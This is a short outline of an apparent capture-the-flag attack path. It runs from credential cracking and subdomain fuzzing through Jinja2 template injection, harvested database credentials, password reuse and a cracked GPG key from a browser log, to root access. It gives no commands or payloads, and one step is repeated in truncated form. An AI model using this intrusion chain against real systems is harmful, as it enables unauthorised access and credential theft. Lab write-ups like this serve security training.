• Download and analysis docker image – db.sqlite3 file with user credentials – Password cracking – Access admin LTE3 (https://adminlte.io/).
• Information leaked – Subdomain fuzzing.
• Searching invite_code into docker image file to create an account – Access admin LTE3 demo and roundcube mail.
• Server Side Template Injection (SSTi – jinja2) – Access as “www-data” user.
• System enumeration as www-data – Mysql credentials into passbolt php file – Database enumeration – Find a PGP encrypted message.
• Password reused for user “eddie“.
• System enumeration as eddie – Find GPG private key into a google chrome log file – GPG2john – Cracking GPG hash –

System Own:

• System enumeration as eddie – Find GPG private key into a google chrome log file – GPG2john – Cracking GPG hash – Decrypt GPG message to read a password.
• Password reused for user “root“.